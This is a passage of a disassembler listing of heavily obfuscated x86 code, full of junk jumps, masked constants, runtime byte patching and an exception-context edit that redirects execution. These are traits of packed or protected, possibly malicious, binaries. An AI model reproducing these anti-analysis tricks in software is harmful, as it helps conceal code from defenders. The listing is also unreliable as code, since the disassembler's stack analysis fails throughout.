sub_44AD49	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_44AD67:				; CODE XREF: y2kk37jd:0043DAF0j
		jle	loc_44B694
		adc	edi, eax
		xchg	edx, [edi]
; START	OF FUNCTION CHUNK FOR sub_4514DE

loc_44AD71:				; CODE XREF: sub_4514DE:loc_4461DCj
		rol	esi, 1Fh
		add	esi, 2F704DA3h
		jnz	loc_44E1C3
; END OF FUNCTION CHUNK	FOR sub_4514DE
; START	OF FUNCTION CHUNK FOR sub_44EF0D

loc_44AD80:				; CODE XREF: sub_44EF0D-157Bj
		jmp	sub_4468E0
; END OF FUNCTION CHUNK	FOR sub_44EF0D
; ---------------------------------------------------------------------------
		cmp	ecx, 4E5D95C3h
		jmp	loc_45B390
; ---------------------------------------------------------------------------

locret_44AD90:				; CODE XREF: y2kk37jd:0044B80Fj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444D6F

loc_44AD91:				; CODE XREF: sub_444D6F+7F73j
		jmp	loc_45AEC2
; END OF FUNCTION CHUNK	FOR sub_444D6F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_44AD96:				; CODE XREF: sub_445226+64A1j
		jmp	loc_45A175
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443ECB

loc_44AD9B:				; CODE XREF: sub_443ECB:loc_443ED1j
		pop	ebx
		push	0E4A346E5h
		jmp	loc_45A87C
; END OF FUNCTION CHUNK	FOR sub_443ECB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4492F7

loc_44ADA6:				; CODE XREF: sub_4492F7:loc_440E91j
		movzx	eax, byte ptr [eax]
		mov	[ebp-1Ch], eax
		jnz	loc_44D311
		inc	dword ptr [ebp-20h]
		jmp	loc_43C9FC
; END OF FUNCTION CHUNK	FOR sub_4492F7
; ---------------------------------------------------------------------------

loc_44ADBA:				; CODE XREF: y2kk37jd:loc_44F345j
					; y2kk37jd:0044F358j
		xor	eax, 0B0B5D5E4h
		add	eax, ebp
		add	eax, 0AEC0D5C5h
		mov	eax, [eax]
		push	eax
		jmp	loc_441957
; ---------------------------------------------------------------------------

loc_44ADD0:				; CODE XREF: y2kk37jd:00453C1Bj
		push	edx
		push	1CAE5E8Bh
		pop	edx
		or	edx, 2F4CF81Dh
		and	edx, 0E43931F6h
		add	edx, 0DC1CA21Eh
		mov	[edx], eax
		pop	edx
		jmp	loc_456E23
; ---------------------------------------------------------------------------
		test	eax, ebp

loc_44ADF3:				; CODE XREF: y2kk37jd:0045476Ej
		jmp	loc_43E8AF
; ---------------------------------------------------------------------------
		xchg	eax, [ecx]
		jmp	sub_459546
; ---------------------------------------------------------------------------

loc_44ADFF:				; CODE XREF: y2kk37jd:00441899j
		cmp	esi, edi
		jmp	loc_4534FA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F911

loc_44AE06:				; CODE XREF: sub_43F911:loc_44302Cj
		add	eax, 0F67913C0h
		add	eax, ebp
		add	eax, 4A84217Fh
		mov	eax, [eax]
		xor	edx, edx
		push	edx
		push	eax
		mov	eax, [ebp-4]
		jmp	loc_45AB1D
; END OF FUNCTION CHUNK	FOR sub_43F911
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_79. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456809

loc_44AE23:				; CODE XREF: sub_456809:loc_44B17Ej
		jno	loc_43E96F
		cdq
		jmp	loc_43F8F1
; ---------------------------------------------------------------------------

loc_44AE2F:				; CODE XREF: sub_456809:loc_43D154j
					; sub_445787+2867j
		sub	ebx, edx
		jns	loc_43F2E7
		sub	ebx, 68637F15h
		jmp	loc_4571B7
; END OF FUNCTION CHUNK	FOR sub_456809
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F1C4

loc_44AE42:				; CODE XREF: sub_43F1C4:loc_448271j
		xchg	ecx, [esp+4+var_4]
		jmp	sub_4577FE
; END OF FUNCTION CHUNK	FOR sub_43F1C4
; ---------------------------------------------------------------------------
		test	al, al
		jz	loc_454362
		jmp	loc_445587
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4440AB

loc_44AE57:				; CODE XREF: sub_4440AB:loc_443BD3j
		jnb	loc_457A1B
		jmp	loc_44CE9B
; END OF FUNCTION CHUNK	FOR sub_4440AB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44606C

loc_44AE62:				; CODE XREF: sub_44606C:loc_44093Fj
		jnz	loc_44105A

loc_44AE68:				; CODE XREF: sub_450D78+Dj
		jmp	loc_4424E3
; END OF FUNCTION CHUNK	FOR sub_44606C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4599BE

loc_44AE6D:				; CODE XREF: sub_4599BE-18AE2j
		jmp	loc_44B0C5
; END OF FUNCTION CHUNK	FOR sub_4599BE
; ---------------------------------------------------------------------------
		sbb	esi, edx
		cdq
		shl	ecx, 13h
		xchg	ebx, edx
		xor	ecx, ebx
		jmp	loc_44105A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44023C

loc_44AE81:				; CODE XREF: sub_44023C+A563j
		mov	edi, eax
		xchg	edi, [esp+28h+var_28]
		push	0
		push	edx
		push	4A9C48D7h
		jmp	loc_442391
; END OF FUNCTION CHUNK	FOR sub_44023C
; ---------------------------------------------------------------------------
		sbb	ecx, edi
		jmp	loc_457466
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CF38

loc_44AE9A:				; CODE XREF: sub_44CF38:loc_44212Ej
		cmp	ecx, 90EB9B9Fh
		rol	edx, 16h
		push	offset sub_451515
		jmp	loc_454206
; END OF FUNCTION CHUNK	FOR sub_44CF38
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453B38

loc_44AEAD:				; CODE XREF: sub_453B38+6102j
		jz	loc_457C9A
		or	ebx, 311D7D7Ah
		jmp	loc_445F8A
; END OF FUNCTION CHUNK	FOR sub_453B38
; ---------------------------------------------------------------------------

loc_44AEBE:				; CODE XREF: y2kk37jd:004481E4j
		pop	ebx
		add	ebx, ds:4000ECh
		cmp	ebx, 0C865FA59h
		jmp	loc_44F920
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CC31

loc_44AED0:				; CODE XREF: sub_44CC31:loc_441135j
		call	sub_43EAA8

loc_44AED5:				; CODE XREF: sub_45B7AA-BBC5j
		jmp	loc_445AE1
; END OF FUNCTION CHUNK	FOR sub_44CC31
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B233

loc_44AEDA:				; CODE XREF: sub_44B233+9j
		jmp	nullsub_469
; END OF FUNCTION CHUNK	FOR sub_44B233
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4577FE

loc_44AEDF:				; CODE XREF: sub_4577FE-189CDj
		jmp	ds:dword_41E108
; END OF FUNCTION CHUNK	FOR sub_4577FE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F2F2

loc_44AEE5:				; CODE XREF: sub_43F2F2+1548Cj
		jmp	sub_440CD1
; END OF FUNCTION CHUNK	FOR sub_43F2F2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_374. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		and	dword ptr [ebp+5A00004Ah], 0FFFFFF8Bh
		add	al, 24h
		push	esi
		mov	esi, edx
		call	sub_445E1C
; START	OF FUNCTION CHUNK FOR sub_4477F9

loc_44AEFC:				; CODE XREF: sub_4477F9+11j
		jmp	loc_44C04E
; END OF FUNCTION CHUNK	FOR sub_4477F9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458713

loc_44AF01:				; CODE XREF: sub_458713-19690j
		jmp	loc_4437B8
; END OF FUNCTION CHUNK	FOR sub_458713
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44884D

loc_44AF06:				; CODE XREF: sub_44884D-2800j
		jge	loc_452D0A
		add	edx, eax
		jmp	loc_452D07
; END OF FUNCTION CHUNK	FOR sub_44884D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446AC6

loc_44AF13:				; CODE XREF: sub_446AC6:loc_446AD0j
		jnz	loc_449141
		jmp	loc_448005
; END OF FUNCTION CHUNK	FOR sub_446AC6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449129

loc_44AF1E:				; CODE XREF: sub_449129+D30Dj
		mov	dword ptr [eax], 737361h
		push	edx
		push	4FF0B47Fh
		pop	edx
		and	edx, 91EFFEBh
		jmp	loc_445542
; END OF FUNCTION CHUNK	FOR sub_449129

; =============== S U B	R O U T	I N E =======================================



sub_44AF36	proc near		; CODE XREF: sub_44AC89+B748p
					; y2kk37jd:00459E3Cj

arg_0		= dword	ptr  4

		xchg	ecx, [esp+0]
		pop	ecx
		xchg	edx, [esp-4+arg_0]
		jmp	sub_454413
sub_44AF36	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		call	sub_443992

loc_44AF47:				; CODE XREF: y2kk37jd:0044EDEDj
		mov	byte ptr [eax],	0C3h
		jmp	loc_44F851
; ---------------------------------------------------------------------------
		call	nullsub_13
		jmp	ds:dword_41E190
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BD49

loc_44AF5A:				; CODE XREF: sub_43BD49+11j
		jmp	loc_45A63E
; END OF FUNCTION CHUNK	FOR sub_43BD49
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_13. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
		add	bl, 15h
		add	[eax], eax
		pop	edx
		mov	eax, [esp]
		jmp	loc_45B893
; ---------------------------------------------------------------------------

loc_44AF6E:				; CODE XREF: y2kk37jd:0044C468j
					; y2kk37jd:0044E327j
		or	edi, 26A06215h
		add	edi, 0D1905E3Dh
		call	sub_43E5B9
; START	OF FUNCTION CHUNK FOR sub_44F142

loc_44AF7F:				; CODE XREF: sub_44F142+10j
		jmp	loc_44413C
; END OF FUNCTION CHUNK	FOR sub_44F142
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AAA1

loc_44AF84:				; CODE XREF: sub_44AAA1:loc_4496B1j
		mov	[eax], ebp
		jmp	loc_452DFA
; END OF FUNCTION CHUNK	FOR sub_44AAA1
; ---------------------------------------------------------------------------
		mov	eax, ds:dword_44FC84
		call	sub_4526B7
		mov	esp, ebp
		xchg	edi, [esp]
		jmp	loc_454B56
; ---------------------------------------------------------------------------
		db 0Fh
		dd 0FF5A228Ah, 2C2F7FFh, 0E91123F7h, 51F0h
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45877C

loc_44AFB0:				; CODE XREF: sub_45877C-1B16j
		xchg	edx, eax
		xor	ebx, offset byte_49162F
		jmp	sub_44023C
; END OF FUNCTION CHUNK	FOR sub_45877C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_259. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED86

loc_44AFBE:				; CODE XREF: sub_43ED86+1AC08j
		jmp	loc_45AD04
; END OF FUNCTION CHUNK	FOR sub_43ED86
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45689F

loc_44AFC3:				; CODE XREF: sub_45689F-16FCCj
		jl	loc_450FCB

loc_44AFC9:				; CODE XREF: sub_44314E+194E0j
		jmp	loc_45128B
; END OF FUNCTION CHUNK	FOR sub_45689F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447E3E

loc_44AFCE:				; CODE XREF: sub_447E3E+EE41j
		jmp	nullsub_395
; END OF FUNCTION CHUNK	FOR sub_447E3E
; ---------------------------------------------------------------------------

loc_44AFD3:				; CODE XREF: y2kk37jd:004481BCj
		jmp	locret_446D5D
; ---------------------------------------------------------------------------
		xor	ebx, 838B22E6h
		ror	edi, 1Bh
		add	ecx, ebp
		jmp	loc_450FCB
; ---------------------------------------------------------------------------
		push	ecx
		mov	ecx, eax
		xchg	ecx, [esp]
		ror	eax, 0Ch
		jmp	loc_444956

; =============== S U B	R O U T	I N E =======================================



sub_44AFF6	proc near		; CODE XREF: sub_44B508+4j

; FUNCTION CHUNK AT 0043C933 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0043D820 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448875 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00449C4A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A40A SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044DC15 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004509F0 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004523E5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045466D SIZE 0000000F BYTES

		push	ebp
		jmp	loc_45466D
sub_44AFF6	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_44AFFC:				; CODE XREF: y2kk37jd:00447EAEj
					; y2kk37jd:loc_44F554j
		mov	eax, [ebp-1Ch]
		cmp	byte ptr [eax],	0
		jnz	loc_442988
; START	OF FUNCTION CHUNK FOR sub_4429DD

loc_44B008:				; CODE XREF: sub_4429DD+161Ej
		jz	loc_451C39
		jmp	loc_4547C1
; END OF FUNCTION CHUNK	FOR sub_4429DD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_44B013:				; CODE XREF: sub_445226:loc_4564A3j
		and	edx, 9B9853DBh
		cmp	edx, 0D962DC3h
		jmp	loc_458B65
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------

loc_44B024:				; CODE XREF: y2kk37jd:00443C6Cj
		pop	eax
		rol	eax, 0Eh
		add	eax, 9EE7C4F3h
		xor	ebx, eax
		pop	eax
		adc	ecx, edx
		js	loc_44E602
		push	esi
		jmp	loc_457E30

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_44B03F	proc near		; CODE XREF: sub_440B7C:loc_43D27Cp
					; sub_445226+8358p

; FUNCTION CHUNK AT 0043BEBE SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043DA97 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0043E22F SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00442169 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445B5C SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044BC6F SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044CFBB SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044DBE7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045011F SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00450374 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00452128 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045216A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004572B2 SIZE 00000005 BYTES

		push	eax
		mov	eax, ebp
		xchg	eax, [esp+0]
		mov	ebp, esp
		call	sub_45354C

loc_44B04C:				; CODE XREF: sub_457FAC+FD3j
		jmp	loc_452128
sub_44B03F	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4578A6

loc_44B051:				; CODE XREF: sub_4578A6-19AD3j
		add	eax, ebp
		push	ecx
		push	9BEE8Ah
		pop	ecx
		or	ecx, 5A3CEE48h
		jmp	loc_45671A
; END OF FUNCTION CHUNK	FOR sub_4578A6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A33C

loc_44B065:				; CODE XREF: sub_44A33C:loc_44EA35j
		and	ebx, 0DDC33CE0h
		rol	ebx, 1Fh
		and	ebx, 0CFB34EE5h
		cmp	ebx, 657891D9h
		jmp	loc_4538DC
; END OF FUNCTION CHUNK	FOR sub_44A33C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C851

loc_44B07F:				; CODE XREF: sub_43C851+190A0j
		jno	loc_4428F8
		or	eax, edi
		pop	ebx
		sub	eax, ebp
		test	edi, 41BE551Ch
		jmp	loc_453AE0
; END OF FUNCTION CHUNK	FOR sub_43C851
; ---------------------------------------------------------------------------

loc_44B095:				; CODE XREF: y2kk37jd:00441D54j
		xor	edi, 5108B7B9h
		add	eax, edi
		pop	edi
		mov	eax, [eax]
		push	edx
		jmp	loc_43E55E

; =============== S U B	R O U T	I N E =======================================



sub_44B0A6	proc near		; CODE XREF: sub_4573E1j
					; DATA XREF: sub_44D627+9DB0o

arg_C		= dword	ptr  10h

		xchg	esi, [esp+0]
		mov	ecx, [esp+arg_C]
		mov	dword ptr [ecx], 10001h
		lea	eax, loc_43B88E
		mov	[ecx+0B8h], eax
		pop	ecx
		call	sub_43B882
sub_44B0A6	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_4599BE

loc_44B0C5:				; CODE XREF: sub_4599BE:loc_44AE6Dj
		jnz	loc_44D797
		jmp	loc_451589
; END OF FUNCTION CHUNK	FOR sub_4599BE

; =============== S U B	R O U T	I N E =======================================



sub_44B0D0	proc near		; CODE XREF: y2kk37jd:0043EB38j
					; sub_454D0F+72ABp

; FUNCTION CHUNK AT 0043BAC2 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0043CBA0 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0043CC2E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043CE7A SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0043DE81 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043FAB7 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004433F3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00447384 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00450FD5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452778 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 004583D1 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0045BE99 SIZE 0000001C BYTES

		xchg	eax, [esp+0]
		pop	eax
		mov	ebp, esp
		push	ecx
		mov	[ebp-4], eax
		mov	eax, [ebp-4]
		mov	al, [eax]
		jmp	loc_450FD5
sub_44B0D0	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F618

loc_44B0E4:				; CODE XREF: sub_43F618+8j
		xchg	ecx, [esp+4+var_4]
		mov	ebp, esp
		push	ecx
		push	edi
		jmp	loc_456008
; END OF FUNCTION CHUNK	FOR sub_43F618

; =============== S U B	R O U T	I N E =======================================



sub_44B0F0	proc near		; DATA XREF: sub_43B7F3+1858Bo
		mov	byte ptr [eax],	0C3h
		jmp	sub_44F086
sub_44B0F0	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F086

loc_44B0F8:				; CODE XREF: sub_44F086+1j
		mov	eax, [esp+0]
		push	eax
		mov	eax, edx
		xchg	eax, [esp+4+var_4]
		push	esi
		mov	esi, edx
		jmp	loc_449FD5
; END OF FUNCTION CHUNK	FOR sub_44F086
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446C40

loc_44B109:				; CODE XREF: sub_446C40+8j
		jz	loc_454802
		jmp	loc_44B850
; END OF FUNCTION CHUNK	FOR sub_446C40
; ---------------------------------------------------------------------------

loc_44B114:				; CODE XREF: y2kk37jd:00443E81j
		xchg	esi, [ebp+0]

; =============== S U B	R O U T	I N E =======================================



sub_44B117	proc near		; CODE XREF: sub_4459CC-9333p

; FUNCTION CHUNK AT 00449FB8 SIZE 0000001D BYTES

		xchg	esi, [esp+0]
		pop	esi
		push	edx
		push	3C12FD39h
		jmp	loc_449FB8
sub_44B117	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C851

loc_44B126:				; CODE XREF: sub_43C851+CC7Bj
		call	sub_45B18C

loc_44B12B:				; CODE XREF: sub_44E677-10B80j
		jmp	loc_446BEB
; END OF FUNCTION CHUNK	FOR sub_43C851
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F8B8

loc_44B130:				; CODE XREF: sub_43F8B8-45F0j
		call	sub_44426A
; END OF FUNCTION CHUNK	FOR sub_43F8B8
; START	OF FUNCTION CHUNK FOR sub_457533

loc_44B135:				; CODE XREF: sub_457533:loc_4493E7j
		call	sub_43CA49

loc_44B13A:				; CODE XREF: y2kk37jd:loc_45A9F5j
		push	offset loc_43CEB3
		jmp	nullsub_211
; END OF FUNCTION CHUNK	FOR sub_457533
; ---------------------------------------------------------------------------

loc_44B144:				; CODE XREF: y2kk37jd:loc_44A2E6j
		lea	eax, [ebp-4]
		push	eax
		call	sub_447832
		push	eax
		jmp	loc_4456EC
; ---------------------------------------------------------------------------

locret_44B153:				; CODE XREF: y2kk37jd:004580A4j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440A37

loc_44B154:				; CODE XREF: sub_440A37+Bj
		jmp	nullsub_495
; END OF FUNCTION CHUNK	FOR sub_440A37
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442938

loc_44B159:				; CODE XREF: sub_442938-2592j
		rol	eax, 0Ch
		push	eax
		push	esi
		push	0F482B6A1h
		jmp	loc_445124
; END OF FUNCTION CHUNK	FOR sub_442938
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D412

loc_44B168:				; CODE XREF: sub_43D412+A868j
		push	edx
		call	sub_454371
; END OF FUNCTION CHUNK	FOR sub_43D412
; START	OF FUNCTION CHUNK FOR sub_456809

loc_44B16E:				; CODE XREF: sub_456809:loc_43F2E7j
		jmp	loc_4593C1
; END OF FUNCTION CHUNK	FOR sub_456809
; ---------------------------------------------------------------------------

loc_44B173:				; CODE XREF: y2kk37jd:004500FCj
		mov	eax, esi
		shl	ebp, 8
		test	edi, 0EC3C0CA9h
; START	OF FUNCTION CHUNK FOR sub_456809

loc_44B17E:				; CODE XREF: sub_456809:loc_443073j
		jmp	loc_44AE23
; END OF FUNCTION CHUNK	FOR sub_456809
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4438B1

loc_44B183:				; CODE XREF: sub_4438B1:loc_44E58Dj
		mov	eax, 0DD70DD34h
		call	sub_44113A
		xor	eax, 0F24FF03Dh
		add	eax, 0CE1746C1h
		xor	eax, 0C9DC29D8h
		jmp	loc_43C260
; END OF FUNCTION CHUNK	FOR sub_4438B1
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_471. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454C24

loc_44B1A5:				; CODE XREF: sub_454C24-A63Aj
		jl	loc_4478A6
; END OF FUNCTION CHUNK	FOR sub_454C24
; START	OF FUNCTION CHUNK FOR sub_4411C3

loc_44B1AB:				; CODE XREF: sub_4411C3-DF7j
		jmp	loc_45B2BE
; END OF FUNCTION CHUNK	FOR sub_4411C3
; ---------------------------------------------------------------------------

loc_44B1B0:				; CODE XREF: y2kk37jd:0043CDABj
		jmp	loc_448DFC
; ---------------------------------------------------------------------------
		cmp	ebp, 0BF2EEA03h
		jmp	loc_447892
; ---------------------------------------------------------------------------

loc_44B1C0:				; CODE XREF: y2kk37jd:loc_450BCCj
		cmp	esi, ebx
		jmp	loc_43D740
; ---------------------------------------------------------------------------
		jnz	loc_45B8D1
		jmp	sub_43DBDD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440FC9

loc_44B1D2:				; CODE XREF: sub_440FC9:loc_45AEE5j
		jnz	loc_43DCA2
		jmp	loc_44CFCE
; END OF FUNCTION CHUNK	FOR sub_440FC9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_44B1DD:				; CODE XREF: sub_4448E2:loc_444F03j
		pop	edi
		rol	eax, 14h
		xor	eax, 84624290h
		jmp	loc_456E67
; END OF FUNCTION CHUNK	FOR sub_4448E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4424CA

loc_44B1EC:				; CODE XREF: sub_4424CAj
		mov	eax, ds:dword_45C598
		push	offset loc_44B32A
		jmp	loc_45695D
; END OF FUNCTION CHUNK	FOR sub_4424CA
; ---------------------------------------------------------------------------

loc_44B1FC:				; CODE XREF: y2kk37jd:004457F6j
		pop	eax
		call	sub_454251

loc_44B202:				; CODE XREF: y2kk37jd:00453C5Cj
		jmp	loc_43C6C0
; ---------------------------------------------------------------------------

loc_44B207:				; CODE XREF: y2kk37jd:00451D7Ej
		jmp	locret_44ED71
; ---------------------------------------------------------------------------

loc_44B20C:				; CODE XREF: y2kk37jd:0043E40Cj
		jmp	loc_451F57
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449DFE

loc_44B211:				; CODE XREF: y2kk37jd:00440B3Aj
					; sub_449DFE+10B4Bj
		push	0B86A85D0h
		add	ebp, edx
		jmp	loc_445A04
; END OF FUNCTION CHUNK	FOR sub_449DFE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448797

loc_44B21D:				; CODE XREF: sub_448797+DE16j
		add	esi, 0B9B7EB21h
		jmp	sub_454251
; END OF FUNCTION CHUNK	FOR sub_448797
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_88. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450B10

loc_44B229:				; CODE XREF: sub_450B10+13j
		jmp	sub_442C3E
; END OF FUNCTION CHUNK	FOR sub_450B10
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AFC4

loc_44B22E:				; CODE XREF: sub_45AFC4-1D0AAj
		jmp	nullsub_277
; END OF FUNCTION CHUNK	FOR sub_45AFC4

; =============== S U B	R O U T	I N E =======================================



sub_44B233	proc near		; DATA XREF: sub_455D37+Bo

; FUNCTION CHUNK AT 0044AEDA SIZE 00000005 BYTES

		push	eax
		push	edi
		mov	edi, eax
		push	offset sub_44686E
		jmp	loc_44AEDA
sub_44B233	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_44B241:				; CODE XREF: sub_445226:loc_44AB21j
		add	ebx, ecx
		cdq
		jmp	loc_43BA03
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------

loc_44B249:				; CODE XREF: y2kk37jd:0043D1E2j
		jns	sub_443831

; =============== S U B	R O U T	I N E =======================================



sub_44B24F	proc near		; CODE XREF: sub_43ED19:loc_442D14p

; FUNCTION CHUNK AT 0043D04B SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004492E1 SIZE 00000005 BYTES

		xchg	esi, [esp+0]
		pop	esi
		push	771648C4h
		pop	esi
		sub	esi, ds:4000EDh
		xor	esi, 77DCC2EBh
		and	esi, 0D9DCD551h
		jmp	loc_4492E1
sub_44B24F	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		push	esi
		mov	esi, eax
		xchg	esi, [esp]
		ror	eax, 4
		jmp	loc_44F32F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_44B27E:				; CODE XREF: sub_4448E2-B42j
		js	loc_456467
		pushf
		and	edx, 0C93B3FC8h
		jmp	loc_44CD13
; END OF FUNCTION CHUNK	FOR sub_4448E2
; ---------------------------------------------------------------------------

loc_44B290:				; CODE XREF: y2kk37jd:0045AC23j
		jz	loc_445E0B
		mov	esi, ecx
		not	ecx
; START	OF FUNCTION CHUNK FOR sub_4578A6

loc_44B29A:				; CODE XREF: sub_4578A6:loc_43C2EFj
					; y2kk37jd:004526C7j
		add	ecx, 1926A04Ch
		add	eax, ecx
		pop	ecx
		jmp	loc_4555A3
; END OF FUNCTION CHUNK	FOR sub_4578A6
; ---------------------------------------------------------------------------

loc_44B2A8:				; CODE XREF: y2kk37jd:loc_4494E8j
		or	edx, 73ADD61h
		sub	edx, 0CA032A44h
		xor	edx, 6DB8A0B1h
		xchg	edx, [esp]
; START	OF FUNCTION CHUNK FOR sub_4507BF

loc_44B2BD:				; CODE XREF: sub_4507BF+36A3j
		push	ecx
		pushf
		push	4B277CA1h
		pop	ecx
		jmp	loc_454736
; END OF FUNCTION CHUNK	FOR sub_4507BF
; ---------------------------------------------------------------------------
		dw 0C83Bh
		dd 0FFFCCEE9h
		db 0FFh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BF31

loc_44B2D1:				; CODE XREF: sub_43BF31+15967j
		sub	edi, 872EE068h
		rol	ecx, 11h

loc_44B2DA:				; CODE XREF: sub_43BF31:loc_451891j
		add	eax, 0BC10189Dh
		call	sub_442C3E
		push	ebx
		push	offset loc_44119A
		jmp	loc_443928
; END OF FUNCTION CHUNK	FOR sub_43BF31

; =============== S U B	R O U T	I N E =======================================



sub_44B2F0	proc near		; CODE XREF: sub_43EF4F:loc_43E5EDp
					; y2kk37jd:0045BA0Fj

; FUNCTION CHUNK AT 00451D5F SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0045AB2C SIZE 0000001D BYTES

		xchg	eax, [esp+0]

loc_44B2F3:				; CODE XREF: y2kk37jd:loc_45BCDAj
		pop	eax
		push	0B0712529h
		pop	eax
		and	eax, 89404DFFh
		jmp	loc_451D5F
sub_44B2F0	endp ; sp-analysis failed

